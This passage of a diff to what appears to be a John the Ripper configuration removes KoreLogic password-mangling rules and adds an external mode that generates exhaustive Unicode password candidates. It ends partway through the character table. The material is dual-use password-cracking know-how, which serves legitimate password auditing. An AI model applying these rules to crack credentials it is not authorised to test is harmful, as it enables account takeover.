-[:c] /a /e /l /[os] sa4 se3 sl1 s\0\p[0$] \p1[:M] \p1[:c] \p1[:Q]
-[:c] /a /[el] /o /s sa4 s\0\p[31] so0 ss$ \p1[:M] \p1[:c] \p1[:Q]
-[:c] /e /l /o /s se3 sl1 so0 ss$ \p1[:M] \p1[:c] \p1[:Q]
-[:c] /a /e /l /o /s sa4 se3 sl1 so0 ss$ \p1[:M] \p1[:c] \p1[:Q]
-
-;[List.Rules:KoreLogicRulesReplaceSpecial2Special]
-# Kore's rules were missing "*"
-/! s![@#$%^&*()\-=_+\\|;:'",./?><]
-/@ s@[!#$%^&*()\-=_+\\|;:'",./?><]
-/# s#[!@$%^&*()\-=_+\\|;:'",./?><]
-/$ s$[!@#%^&*()\-=_+\\|;:'",./?><]
-/% s%[!@#$^&*()\-=_+\\|;:'",./?><]
-/^ s^[!@#$%&*()\-=_+\\|;:'",./?><]
-/& s&[!@#$%^*()\-=_+\\|;:'",./?><]
-/( s([!@#$%^&*)\-=_+\\|;:'",./?><]
-/) s([!@#$%^&*(\-=_+\\|;:'",./?><]
-# Kore's ruleset erroneously had:
-#/-s--
-/- s-[!@#$%^&*()=_+\\|;:'",./?><]
-/= s=[!@#$%^&*()\-_+\\|;:'",./?><]
-/_ s_[!@#$%^&*()\-=+\\|;:'",./?><]
-/+ s+[!@#$%^&*()\-=_\\|;:'",./?><]
-# Kore's rules did not replace backslash
-/\\ s\\[!@#$%^&*()\-=_+|;:'",./?><]
-/| s|[!@#$%^&*()\-=_+\\;:'",./?><]
-/; s;[!@#$%^&*()\-=_+\\|:'",./?><]
-/: s:[!@#$%^&*()\-=_+\\|;'",./?><]
-/' s'[!@#$%^&*()\-=_+\\|;:",./?><]
-/" s"[!@#$%^&*()\-=_+\\|;:',./?><]
-/, s,[!@#$%^&*()\-=_+\\|;:'"./?><]
-/. s.[!@#$%^&*()\-=_+\\|;:'",/?><]
-// s/[!@#$%^&*()\-=_+\\|;:'",.?><]
-/> s>[!@#$%^&*()\-=_+\\|;:'",./?<]
-/< s<[!@#$%^&*()\-=_+\\|;:'",./?>]
-
-;[List.Rules:KoreLogicRulesReplaceLetters]
-/a sa[b-z]
-/b sb[ac-z]
-/c sc[abd-z]
-/d sd[a-ce-z]
-/e se[a-df-z]
-/f sf[a-eg-z]
-/g sg[a-fh-z]
-/h sh[a-gi-z]
-/i si[a-hj-z]
-/j sj[a-ik-z]
-/k sk[a-jl-z]
-/l sl[a-km-z]
-/m sm[a-ln-z]
-/n sn[a-mo-z]
-/o so[a-np-z]
-/p sp[a-oq-z]
-/q sq[a-pr-z]
-/r sr[a-qs-z]
-/s ss[a-rt-z]
-/t st[a-su-z]
-/u su[a-tv-z]
-/v sv[a-uw-z]
-/w sw[a-vx-z]
-/x sx[a-wyz]
-/y sy[a-xz]
-# Kore's ruleset was truncated after "/zszr"
-/z sz[a-y]
-c /[a-z] s\0[A-Z]
-
-;[List.Rules:KoreLogicRulesAppendSpecialNumberNumber]
-[c:] \p[c:] Az"[!$@#%.][0-9][0-9]" <+
-[c:] \p[c:] Azq[^&()_+\-={}|[\]\\;'":,/<>?`~*][0-9][0-9]q <+
-
-;[List.Rules:KoreLogicRulesPrependNumNumAppendSpecial]
-[c:] \p[c:] A0"[0-9][0-9]" <* $[!$@#%.]
-[c:] \p[c:] A0"[0-9][0-9]" <* $[^&()_+\-={}|[\]\\;'":,/<>?`~*]
-
-;[List.Rules:KoreLogicRulesPrependNumNumSpecial]
-[c:] \p[c:] A0"[0-9][0-9][!$@#%.]"
-[c:] \p[c:] A0q[0-9][0-9][^&()_+\-={}|[\]\\;'":,/<>?`~*]q
-
-;[List.Rules:KoreLogicRulesAppend2NumSpecial]
-[c:] \p[c:] Az"[0-9][0-9][!$@#%.]" <+
-[c:] \p[c:] Azq[0-9][0-9][^&()_+\-={}|[\]\\;'":,/<>?`~*]q <+
-
-;[List.Rules:KoreLogicRulesPrependDaysWeek]
-A0"[Mm][oO0][nN][dD][aA4@][yY]"
-A0"[Tt][uU][eE3][sS$][dD][aA4@][yY]"
-A0"[Ww][eE3][dD][nN][eE3][sS$][dD][aA4@][yY]"
-A0"[Tt][hH][uU][rR][sS$][dD][aA4@][yY]"
-A0"[Ff][rR][iI1!][dD][aA4@][yY]"
-A0"[Ss][aA4@][tT+][uU][rR][dD][aA4@][yY]"
-A0"[Ss][uU][nN][dD][aA4@][yY]"
-
-;[List.Rules:KoreLogicRulesAppendNumbers_and_Specials_Simple-3]
-## Add Number Number Special
-[c:] \p[c:] Azq[0-9][0-9][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*]q <+
-## Add Special Number Number
-[c:] \p[c:] Azq[!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*][0-9][0-9]q <+
-
-;[List.Rules:KoreLogicRulesPrependSpecialSpecialAppendNumber]
-[c:] \p[c:] A0"[!$@#%.][!$@#%.]" <* $[0-9]
-[c:] \p[c:] A0q[^&()_+\-={}|[\]\\;'":,/<>?`~*][^&()_+\-={}|[\]\\;'":,/<>?`~*]q <* $[0-9]
-
-;[List.Rules:KoreLogicRulesAppend4Num]
-[c:] \p[c:] Az"[0-9][0-9][0-9][0-9]" <+
-
-;[List.Rules:KoreLogicRulesPrependNumNumNumNum]
-[c:] \p[c:] A0"[0-9][0-9][0-9][0-9]"
-
-;[List.Rules:KoreLogicRulesPrepend2NumbersAppend2Numbers]
-[c:] \p[c:] A0"[0-9][0-9]" <- Az"[0-9][0-9]"
-
-;[List.Rules:KoreLogicRulesPrependCAPCAPAppendSpecial]
-A0"[A-Z][A-Z]" <* $[!$@#%.]
-A0"[A-Z][A-Z]" <* $[^&()_+\-={}|[\]\\;'":,/<>?`~*]
-
-;[List.Rules:KoreLogicRulesAppendSpecialLowerLower]
-[c:] \p[c:] AzQ[!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*][a-z][a-z]Q <+
-
-# The last line of KoreLogicRulesAppendNumbers_and_Specials_Simple
-;[List.Rules:KoreLogicRulesAppendNumbers_and_Specials_Simple-4]
-# Add 100! ... 999! to the end
-[c:] \p[c:] Azq[0-9][0-9][0-9][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*]q <+
-
-;[List.Rules:KoreLogicRulesAppendSpecial3num]
-[c:] \p[c:] Az"[!$@#%.][0-9][0-9][0-9]" <+
-[c:] \p[c:] Azq[^&()_+\-={}|[\]\\;'":,/<>?`~*][0-9][0-9][0-9]q <+
-
-;[List.Rules:KoreLogicRulesAppendSpecialNumberNumberNumber]
-[c:] \p[c:] Az"[!$@#%.][0-9][0-9][0-9]" <+
-[c:] \p[c:] Azq[^&()_+\-={}|[\]\\;'":,/<>?`~*][0-9][0-9][0-9]q <+
-
-;[List.Rules:KoreLogicRulesAppend3NumSpecial]
-[c:] \p[c:] Az"[0-9][0-9][0-9][!$@#%.]" <+
-[c:] \p[c:] Azq[0-9][0-9][0-9][^&()_+\-={}|[\]\\;'":,/<>?`~*]q <+
-
-;[List.Rules:KoreLogicRulesPrependNumNum_AppendNumSpecial]
-[c:] \p[c:] A0"[0-9][0-9]" Azq[0-9][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*]q <+
-
-;[List.Rules:KoreLogicRulesAppendJustSpecials3Times]
-[c:] \p[c:] Az"[!$@#%.][!$@#%.][!$@#%.]" <+
-[c:] \p[c:] Azq[!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*]q <+
-
-;[List.Rules:KoreLogicRulesAppendCap-Num_or_Special-Twice]
-[c:] \p[c:] Az"[A-Z][0-9][0-9]" <+
-[c:] \p[c:] Azq[A-Z][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*][0-9]q <+
-[c:] \p[c:] Azq[A-Z][0-9][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*]q <+
-[c:] \p[c:] Azq[A-Z][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*]q <+
-
-;[List.Rules:KoreLogicRulesPrependSpecialSpecialAppendNumbersNumber]
-[c:] \p[c:] A0"[!$@#%.][!$@#%.]" <- Az"[0-9][0-9]"
-[c:] \p[c:] A0q[^&()_+\-={}|[\]\\;'":,/<>?`~*][^&()_+\-={}|[\]\\;'":,/<>?`~*]q <- Az"[0-9][0-9]"
-
-;[List.Rules:KoreLogicRulesAppend5Num]
-[c:] \p[c:] Az"[0-9][0-9][0-9][0-9][0-9]" <+
-
-;[List.Rules:KoreLogicRulesAppendSpecial4num]
-[c:] \p[c:] Az"[!$@#%.][0-9][0-9][0-9][0-9]" <+
-[c:] \p[c:] Azq[^&()_+\-={}|[\]\\;'":,/<>?`~*][0-9][0-9][0-9][0-9]q <+
-
-;[List.Rules:KoreLogicRulesPrepend4NumAppendSpecial]
-[c:] \p[c:] A0"[0-9][0-9][0-9][0-9]" <- $[!$@#%.]
-[c:] \p[c:] A0"[0-9][0-9][0-9][0-9]" <- Azq[^&()_+\-={}|[\]\\;'":,/<>?`~*]q
-
-;[List.Rules:KoreLogicRulesAppend4NumSpecial]
-[c:] \p[c:] Az"[0-9][0-9][0-9][0-9][!$@#%.]" <+
-[c:] \p[c:] Azq[0-9][0-9][0-9][0-9][^&()_+\-={}|[\]\\;'":,/<>?`~*]q <+
-
-;[List.Rules:KoreLogicRulesPrependSpecialSpecialAppendNumbersNumberNumber]
-[c:] \p[c:] A0"[!$@#%.][!$@#%.]" Az"[0-9][0-9][0-9]" <+
-[c:] \p[c:] A0q[^&()_+\-={}|[\]\\;'":,/<>?`~*][^&()_+\-={}|[\]\\;'":,/<>?`~*]q Az"[0-9][0-9][0-9]" <+
-
-;[List.Rules:KoreLogicRulesAppend6Num]
-[c:] \p[c:] Az"[0-9][0-9][0-9][0-9][0-9][0-9]" <+
@@ -0,0 +1,1395 @@
+# This  software is Copyright (c) 2012-2018 magnum, and it is hereby
+# released to the general public under the following terms:
+# Redistribution and use in source and binary forms, with or without
+# modification, are permitted.
+#
+# Generic implementation of "dumb" exhaustive search of Unicode BMP.
+# Default is to try *all* allocated characters in the BMP of Unicode v11
+# (there's 55,292 of them). Even if a fast format can exhaust two characters
+# in 15 minutes, three characters would take 1.5 years...
+#
+# Note that these modes will handle --max-len differently than normal: They
+# will consider number of characters as opposed to number of bytes. This
+# means you can naturally just use e.g. --max-len=3 for generating all
+# three-character candidates (which may be up to 9 bytes each).
+[List.External:Dumb16]
+int maxlength;            // Maximum password length to try
+int last;                 // Last character position, zero-based
+int lastid;               // Character index in the last position
+int id[0x7f];             // Current character indices for other positions
+int charset[0x10000], c0; // Characters
+
+void init()
+{
+	int minlength;
+	int i, c;
+
+	# Trigger UTF-32 handling in External mode
+	utf32 = 1;
+
+	if (req_minlen)
+		minlength = req_minlen;
+	else
+		minlength = 1;
+	if (req_maxlen)
+		maxlength = req_maxlen;
+	else
+		maxlength = 2;
+
+	# UTF-8 representation is up to 3x the character length
+	if (maxlength * 3 > cipher_limit)
+		maxlength = (cipher_limit + 2) / 3;
+/*
+ * This defines the character set. This is auto-generated from UnicodeData.txt
+ * and we skip control characters.
+ */
+	i = 0;
+// 0000..007F; Basic Latin
+	c = 0x20;		// from SPACE
+	while (c <= 0x7e)	// ..to TILDE
+		charset[i++] = c++;
+// 0080..00FF; Latin-1 Supplement
+	c = 0xa0;		// from NO-BREAK SPACE
+	while (c <= 0xff)	// ..to LATIN SMALL LETTER Y WITH DIAERESIS
+		charset[i++] = c++;
+// 0100..017F; Latin Extended-A
+	c = 0x100;		// from LATIN CAPITAL LETTER A WITH MACRON
+	while (c <= 0x17f)	// ..to LATIN SMALL LETTER LONG S
+		charset[i++] = c++;
+// 0180..024F; Latin Extended-B
+	c = 0x180;		// from LATIN SMALL LETTER B WITH STROKE
+	while (c <= 0x24f)	// ..to LATIN SMALL LETTER Y WITH STROKE
+		charset[i++] = c++;
+// 0250..02AF; IPA Extensions
+	c = 0x250;		// from LATIN SMALL LETTER TURNED A
+	while (c <= 0x2af)	// ..to LATIN SMALL LETTER TURNED H WITH FISHHOOK AND TAIL
+		charset[i++] = c++;
+// 02B0..02FF; Spacing Modifier Letters
+	c = 0x2b0;		// from MODIFIER LETTER SMALL H
+	while (c <= 0x2ff)	// ..to MODIFIER LETTER LOW LEFT ARROW
+		charset[i++] = c++;
+// 0300..036F; Combining Diacritical Marks
+	c = 0x300;		// from COMBINING GRAVE ACCENT
+	while (c <= 0x36f)	// ..to COMBINING LATIN SMALL LETTER X
+		charset[i++] = c++;
+// 0370..03FF; Greek and Coptic
+	c = 0x370;		// from GREEK CAPITAL LETTER HETA
+	while (c <= 0x377)	// ..to GREEK SMALL LETTER PAMPHYLIAN DIGAMMA
+		charset[i++] = c++;
+	c = 0x37a;		// from GREEK YPOGEGRAMMENI
+	while (c <= 0x37f)	// ..to GREEK CAPITAL LETTER YOT
+		charset[i++] = c++;
+	c = 0x384;		// from GREEK TONOS
+	while (c <= 0x38a)	// ..to GREEK CAPITAL LETTER IOTA WITH TONOS
+		charset[i++] = c++;
+	c = 0x38e;		// from GREEK CAPITAL LETTER UPSILON WITH TONOS
+	while (c <= 0x3a1)	// ..to GREEK CAPITAL LETTER RHO
+		charset[i++] = c++;
+	c = 0x3a3;		// from GREEK CAPITAL LETTER SIGMA
+	while (c <= 0x3ff)	// ..to GREEK CAPITAL REVERSED DOTTED LUNATE SIGMA SYMBOL
+		charset[i++] = c++;
+// 0400..04FF; Cyrillic
+	c = 0x400;		// from CYRILLIC CAPITAL LETTER IE WITH GRAVE
+	while (c <= 0x4ff)	// ..to CYRILLIC SMALL LETTER HA WITH STROKE
+		charset[i++] = c++;
+// 0500..052F; Cyrillic Supplement
+	c = 0x500;		// from CYRILLIC CAPITAL LETTER KOMI DE
+	while (c <= 0x52f)	// ..to CYRILLIC SMALL LETTER EL WITH DESCENDER
+		charset[i++] = c++;
+// 0530..058F; Armenian
+	c = 0x531;		// from ARMENIAN CAPITAL LETTER AYB
+	while (c <= 0x556)	// ..to ARMENIAN CAPITAL LETTER FEH
+		charset[i++] = c++;
+	c = 0x559;		// from ARMENIAN MODIFIER LETTER LEFT HALF RING
+	while (c <= 0x58a)	// ..to ARMENIAN HYPHEN
+		charset[i++] = c++;
+	charset[i++] = 0x58d;	// RIGHT-FACING ARMENIAN ETERNITY SIGN
+	charset[i++] = 0x58f;	// ARMENIAN DRAM SIGN
+// 0590..05FF; Hebrew
+	c = 0x591;		// from HEBREW ACCENT ETNAHTA
+	while (c <= 0x5c7)	// ..to HEBREW POINT QAMATS QATAN
+		charset[i++] = c++;
+	c = 0x5d0;		// from HEBREW LETTER ALEF
+	while (c <= 0x5ea)	// ..to HEBREW LETTER TAV
+		charset[i++] = c++;
+	c = 0x5ef;		// from HEBREW YOD TRIANGLE
+	while (c <= 0x5f4)	// ..to HEBREW PUNCTUATION GERSHAYIM
+		charset[i++] = c++;
+// 0600..06FF; Arabic
+	c = 0x600;		// from ARABIC NUMBER SIGN
+	while (c <= 0x61c)	// ..to ARABIC LETTER MARK
+		charset[i++] = c++;
+	c = 0x61e;		// from ARABIC TRIPLE DOT PUNCTUATION MARK
+	while (c <= 0x6ff)	// ..to ARABIC LETTER HEH WITH INVERTED V
+		charset[i++] = c++;
+// 0700..074F; Syriac
+	c = 0x700;		// from SYRIAC END OF PARAGRAPH
+	while (c <= 0x70d)	// ..to SYRIAC HARKLEAN ASTERISCUS
+		charset[i++] = c++;
+	c = 0x70f;		// from SYRIAC ABBREVIATION MARK
+	while (c <= 0x74a)	// ..to SYRIAC BARREKH
+		charset[i++] = c++;
+	charset[i++] = 0x74d;	// SYRIAC LETTER SOGDIAN ZHAIN
+	charset[i++] = 0x74f;	// SYRIAC LETTER SOGDIAN FE
+// 0750..077F; Arabic Supplement
+	c = 0x750;		// from ARABIC LETTER BEH WITH THREE DOTS HORIZONTALLY BELOW
+	while (c <= 0x77f)	// ..to ARABIC LETTER KAF WITH TWO DOTS ABOVE
+		charset[i++] = c++;
+// 0780..07BF; Thaana
+	c = 0x780;		// from THAANA LETTER HAA
+	while (c <= 0x7b1)	// ..to THAANA LETTER NAA
+		charset[i++] = c++;
+// 07C0..07FF; NKo
+	c = 0x7c0;		// from NKO DIGIT ZERO
+	while (c <= 0x7fa)	// ..to NKO LAJANYALAN
+		charset[i++] = c++;
+	charset[i++] = 0x7fd;	// NKO DANTAYALAN
+	charset[i++] = 0x7ff;	// NKO TAMAN SIGN
+// 0800..083F; Samaritan
+	c = 0x800;		// from SAMARITAN LETTER ALAF
+	while (c <= 0x82d)	// ..to SAMARITAN MARK NEQUDAA
+		charset[i++] = c++;
+	c = 0x830;		// from SAMARITAN PUNCTUATION NEQUDAA
+	while (c <= 0x83e)	// ..to SAMARITAN PUNCTUATION ANNAAU
+		charset[i++] = c++;
+// 0840..085F; Mandaic
+	c = 0x840;		// from MANDAIC LETTER HALQA
+	while (c <= 0x85b)	// ..to MANDAIC GEMINATION MARK
+		charset[i++] = c++;
+	charset[i++] = 0x85e;	// MANDAIC PUNCTUATION
+// 0860..086F; Syriac Supplement
+	c = 0x860;		// from SYRIAC LETTER MALAYALAM NGA
+	while (c <= 0x86a)	// ..to SYRIAC LETTER MALAYALAM SSA
+		charset[i++] = c++;
+// 08A0..08FF; Arabic Extended-A
+	c = 0x8a0;		// from ARABIC LETTER BEH WITH SMALL V BELOW
+	while (c <= 0x8b4)	// ..to ARABIC LETTER KAF WITH DOT BELOW
+		charset[i++] = c++;
+	c = 0x8b6;		// from ARABIC LETTER BEH WITH SMALL MEEM ABOVE
+	while (c <= 0x8bd)	// ..to ARABIC LETTER AFRICAN NOON
+		charset[i++] = c++;
+	c = 0x8d3;		// from ARABIC SMALL LOW WAW
+	while (c <= 0x8ff)	// ..to ARABIC MARK SIDEWAYS NOON GHUNNA
+		charset[i++] = c++;
+// 0900..097F; Devanagari
+	c = 0x900;		// from DEVANAGARI SIGN INVERTED CANDRABINDU
+	while (c <= 0x97f)	// ..to DEVANAGARI LETTER BBA
+		charset[i++] = c++;
+// 0980..09FF; Bengali
+	c = 0x980;		// from BENGALI ANJI
+	while (c <= 0x983)	// ..to BENGALI SIGN VISARGA
+		charset[i++] = c++;
+	c = 0x985;		// from BENGALI LETTER A
+	while (c <= 0x98c)	// ..to BENGALI LETTER VOCALIC L
+		charset[i++] = c++;
+	charset[i++] = 0x98f;	// BENGALI LETTER E
+	charset[i++] = 0x990;	// BENGALI LETTER AI
+	c = 0x993;		// from BENGALI LETTER O
+	while (c <= 0x9a8)	// ..to BENGALI LETTER NA
+		charset[i++] = c++;
+	c = 0x9aa;		// from BENGALI LETTER PA
+	while (c <= 0x9b0)	// ..to BENGALI LETTER RA
+		charset[i++] = c++;
+	c = 0x9b6;		// from BENGALI LETTER SHA
+	while (c <= 0x9b9)	// ..to BENGALI LETTER HA
+		charset[i++] = c++;
+	c = 0x9bc;		// from BENGALI SIGN NUKTA
+	while (c <= 0x9c4)	// ..to BENGALI VOWEL SIGN VOCALIC RR
+		charset[i++] = c++;
+	charset[i++] = 0x9c7;	// BENGALI VOWEL SIGN E
+	charset[i++] = 0x9c8;	// BENGALI VOWEL SIGN AI
+	c = 0x9cb;		// from BENGALI VOWEL SIGN O
+	while (c <= 0x9ce)	// ..to BENGALI LETTER KHANDA TA
+		charset[i++] = c++;
+	charset[i++] = 0x9dc;	// BENGALI LETTER RRA
+	charset[i++] = 0x9dd;	// BENGALI LETTER RHA
+	c = 0x9df;		// from BENGALI LETTER YYA
+	while (c <= 0x9e3)	// ..to BENGALI VOWEL SIGN VOCALIC LL
+		charset[i++] = c++;
+	c = 0x9e6;		// from BENGALI DIGIT ZERO
+	while (c <= 0x9fe)	// ..to BENGALI SANDHI MARK
+		charset[i++] = c++;
+// 0A00..0A7F; Gurmukhi
+	charset[i++] = 0xa01;	// GURMUKHI SIGN ADAK BINDI
+	charset[i++] = 0xa03;	// GURMUKHI SIGN VISARGA
+	c = 0xa05;		// from GURMUKHI LETTER A
+	while (c <= 0xa0a)	// ..to GURMUKHI LETTER UU
+		charset[i++] = c++;
+	charset[i++] = 0xa0f;	// GURMUKHI LETTER EE
+	charset[i++] = 0xa10;	// GURMUKHI LETTER AI
+	c = 0xa13;		// from GURMUKHI LETTER OO
+	while (c <= 0xa28)	// ..to GURMUKHI LETTER NA
+		charset[i++] = c++;
+	c = 0xa2a;		// from GURMUKHI LETTER PA
+	while (c <= 0xa30)	// ..to GURMUKHI LETTER RA
+		charset[i++] = c++;
+	charset[i++] = 0xa32;	// GURMUKHI LETTER LA
+	charset[i++] = 0xa33;	// GURMUKHI LETTER LLA
+	charset[i++] = 0xa35;	// GURMUKHI LETTER VA
+	charset[i++] = 0xa36;	// GURMUKHI LETTER SHA
+	charset[i++] = 0xa38;	// GURMUKHI LETTER SA
+	charset[i++] = 0xa39;	// GURMUKHI LETTER HA
+	c = 0xa3e;		// from GURMUKHI VOWEL SIGN AA
+	while (c <= 0xa42)	// ..to GURMUKHI VOWEL SIGN UU
+		charset[i++] = c++;
+	charset[i++] = 0xa47;	// GURMUKHI VOWEL SIGN EE
+	charset[i++] = 0xa48;	// GURMUKHI VOWEL SIGN AI
+	charset[i++] = 0xa4b;	// GURMUKHI VOWEL SIGN OO
+	charset[i++] = 0xa4d;	// GURMUKHI SIGN VIRAMA
+	c = 0xa59;		// from GURMUKHI LETTER KHHA
+	while (c <= 0xa5c)	// ..to GURMUKHI LETTER RRA
+		charset[i++] = c++;
+	c = 0xa66;		// from GURMUKHI DIGIT ZERO
+	while (c <= 0xa76)	// ..to GURMUKHI ABBREVIATION SIGN
+		charset[i++] = c++;
+// 0A80..0AFF; Gujarati
+	charset[i++] = 0xa81;	// GUJARATI SIGN CANDRABINDU
+	charset[i++] = 0xa83;	// GUJARATI SIGN VISARGA
+	c = 0xa85;		// from GUJARATI LETTER A
+	while (c <= 0xa8d)	// ..to GUJARATI VOWEL CANDRA E
+		charset[i++] = c++;
+	charset[i++] = 0xa8f;	// GUJARATI LETTER E
+	charset[i++] = 0xa91;	// GUJARATI VOWEL CANDRA O
+	c = 0xa93;		// from GUJARATI LETTER O
+	while (c <= 0xaa8)	// ..to GUJARATI LETTER NA
+		charset[i++] = c++;
+	c = 0xaaa;		// from GUJARATI LETTER PA
+	while (c <= 0xab0)	// ..to GUJARATI LETTER RA
+		charset[i++] = c++;
+	charset[i++] = 0xab2;	// GUJARATI LETTER LA
+	charset[i++] = 0xab3;	// GUJARATI LETTER LLA
+	c = 0xab5;		// from GUJARATI LETTER VA
+	while (c <= 0xab9)	// ..to GUJARATI LETTER HA
+		charset[i++] = c++;
+	c = 0xabc;		// from GUJARATI SIGN NUKTA
+	while (c <= 0xac5)	// ..to GUJARATI VOWEL SIGN CANDRA E
+		charset[i++] = c++;
+	charset[i++] = 0xac7;	// GUJARATI VOWEL SIGN E
+	charset[i++] = 0xac9;	// GUJARATI VOWEL SIGN CANDRA O
+	charset[i++] = 0xacb;	// GUJARATI VOWEL SIGN O
+	charset[i++] = 0xacd;	// GUJARATI SIGN VIRAMA
+	c = 0xae0;		// from GUJARATI LETTER VOCALIC RR
+	while (c <= 0xae3)	// ..to GUJARATI VOWEL SIGN VOCALIC LL
+		charset[i++] = c++;
+	c = 0xae6;		// from GUJARATI DIGIT ZERO
+	while (c <= 0xaf1)	// ..to GUJARATI RUPEE SIGN
+		charset[i++] = c++;
+	c = 0xaf9;		// from GUJARATI LETTER ZHA
+	while (c <= 0xaff)	// ..to GUJARATI SIGN TWO-CIRCLE NUKTA ABOVE
+		charset[i++] = c++;
+// 0B00..0B7F; Oriya
+	charset[i++] = 0xb01;	// ORIYA SIGN CANDRABINDU
+	charset[i++] = 0xb03;	// ORIYA SIGN VISARGA
+	c = 0xb05;		// from ORIYA LETTER A
+	while (c <= 0xb0c)	// ..to ORIYA LETTER VOCALIC L
+		charset[i++] = c++;
+	charset[i++] = 0xb0f;	// ORIYA LETTER E
+	charset[i++] = 0xb10;	// ORIYA LETTER AI
+	c = 0xb13;		// from ORIYA LETTER O
+	while (c <= 0xb28)	// ..to ORIYA LETTER NA
+		charset[i++] = c++;
+	c = 0xb2a;		// from ORIYA LETTER PA
+	while (c <= 0xb30)	// ..to ORIYA LETTER RA
+		charset[i++] = c++;
+	charset[i++] = 0xb32;	// ORIYA LETTER LA
+	charset[i++] = 0xb33;	// ORIYA LETTER LLA
+	c = 0xb35;		// from ORIYA LETTER VA
+	while (c <= 0xb39)	// ..to ORIYA LETTER HA
+		charset[i++] = c++;
+	c = 0xb3c;		// from ORIYA SIGN NUKTA
+	while (c <= 0xb44)	// ..to ORIYA VOWEL SIGN VOCALIC RR
+		charset[i++] = c++;
+	charset[i++] = 0xb47;	// ORIYA VOWEL SIGN E
+	charset[i++] = 0xb48;	// ORIYA VOWEL SIGN AI
+	charset[i++] = 0xb4b;	// ORIYA VOWEL SIGN O
+	charset[i++] = 0xb4d;	// ORIYA SIGN VIRAMA
+	charset[i++] = 0xb56;	// ORIYA AI LENGTH MARK
+	charset[i++] = 0xb57;	// ORIYA AU LENGTH MARK
+	charset[i++] = 0xb5c;	// ORIYA LETTER RRA
+	charset[i++] = 0xb5d;	// ORIYA LETTER RHA
+	c = 0xb5f;		// from ORIYA LETTER YYA
+	while (c <= 0xb63)	// ..to ORIYA VOWEL SIGN VOCALIC LL
+		charset[i++] = c++;
+	c = 0xb66;		// from ORIYA DIGIT ZERO
+	while (c <= 0xb77)	// ..to ORIYA FRACTION THREE SIXTEENTHS
+		charset[i++] = c++;
+// 0B80..0BFF; Tamil
+	charset[i++] = 0xb82;	// TAMIL SIGN ANUSVARA
+	charset[i++] = 0xb83;	// TAMIL SIGN VISARGA
+	c = 0xb85;		// from TAMIL LETTER A
+	while (c <= 0xb8a)	// ..to TAMIL LETTER UU
+		charset[i++] = c++;
+	charset[i++] = 0xb8e;	// TAMIL LETTER E
+	charset[i++] = 0xb90;	// TAMIL LETTER AI
+	c = 0xb92;		// from TAMIL LETTER O
+	while (c <= 0xb95)	// ..to TAMIL LETTER KA
+		charset[i++] = c++;
+	charset[i++] = 0xb99;	// TAMIL LETTER NGA
+	charset[i++] = 0xb9a;	// TAMIL LETTER CA
+	charset[i++] = 0xb9e;	// TAMIL LETTER NYA
+	charset[i++] = 0xb9f;	// TAMIL LETTER TTA
+	charset[i++] = 0xba3;	// TAMIL LETTER NNA
+	charset[i++] = 0xba4;	// TAMIL LETTER TA
+	charset[i++] = 0xba8;	// TAMIL LETTER NA
+	charset[i++] = 0xbaa;	// TAMIL LETTER PA
+	c = 0xbae;		// from TAMIL LETTER MA
+	while (c <= 0xbb9)	// ..to TAMIL LETTER HA
+		charset[i++] = c++;
+	c = 0xbbe;		// from TAMIL VOWEL SIGN AA
+	while (c <= 0xbc2)	// ..to TAMIL VOWEL SIGN UU
+		charset[i++] = c++;
+	charset[i++] = 0xbc6;	// TAMIL VOWEL SIGN E
+	charset[i++] = 0xbc8;	// TAMIL VOWEL SIGN AI
+	c = 0xbca;		// from TAMIL VOWEL SIGN O
+	while (c <= 0xbcd)	// ..to TAMIL SIGN VIRAMA
+		charset[i++] = c++;
+	c = 0xbe6;		// from TAMIL DIGIT ZERO
+	while (c <= 0xbfa)	// ..to TAMIL NUMBER SIGN
+		charset[i++] = c++;
+// 0C00..0C7F; Telugu
+	c = 0xc00;		// from TELUGU SIGN COMBINING CANDRABINDU ABOVE
+	while (c <= 0xc0c)	// ..to TELUGU LETTER VOCALIC L
+		charset[i++] = c++;
+	charset[i++] = 0xc0e;	// TELUGU LETTER E
+	charset[i++] = 0xc10;	// TELUGU LETTER AI
+	c = 0xc12;		// from TELUGU LETTER O
+	while (c <= 0xc28)	// ..to TELUGU LETTER NA
+		charset[i++] = c++;
+	c = 0xc2a;		// from TELUGU LETTER PA
+	while (c <= 0xc39)	// ..to TELUGU LETTER HA
+		charset[i++] = c++;
+	c = 0xc3d;		// from TELUGU SIGN AVAGRAHA
+	while (c <= 0xc44)	// ..to TELUGU VOWEL SIGN VOCALIC RR
+		charset[i++] = c++;
+	charset[i++] = 0xc46;	// TELUGU VOWEL SIGN E
+	charset[i++] = 0xc48;	// TELUGU VOWEL SIGN AI
+	c = 0xc4a;		// from TELUGU VOWEL SIGN O
+	while (c <= 0xc4d)	// ..to TELUGU SIGN VIRAMA
+		charset[i++] = c++;
+	charset[i++] = 0xc55;	// TELUGU LENGTH MARK
+	charset[i++] = 0xc56;	// TELUGU AI LENGTH MARK
+	charset[i++] = 0xc58;	// TELUGU LETTER TSA
+	charset[i++] = 0xc5a;	// TELUGU LETTER RRRA
+	c = 0xc60;		// from TELUGU LETTER VOCALIC RR
+	while (c <= 0xc63)	// ..to TELUGU VOWEL SIGN VOCALIC LL
+		charset[i++] = c++;
+	c = 0xc66;		// from TELUGU DIGIT ZERO
+	while (c <= 0xc6f)	// ..to TELUGU DIGIT NINE
+		charset[i++] = c++;
+	c = 0xc78;		// from TELUGU FRACTION DIGIT ZERO FOR ODD POWERS OF FOUR
+	while (c <= 0xc7f)	// ..to TELUGU SIGN TUUMU
+		charset[i++] = c++;
+// 0C80..0CFF; Kannada
+	c = 0xc80;		// from KANNADA SIGN SPACING CANDRABINDU
+	while (c <= 0xc8c)	// ..to KANNADA LETTER VOCALIC L
+		charset[i++] = c++;
+	charset[i++] = 0xc8e;	// KANNADA LETTER E
+	charset[i++] = 0xc90;	// KANNADA LETTER AI
+	c = 0xc92;		// from KANNADA LETTER O
+	while (c <= 0xca8)	// ..to KANNADA LETTER NA
+		charset[i++] = c++;
+	c = 0xcaa;		// from KANNADA LETTER PA
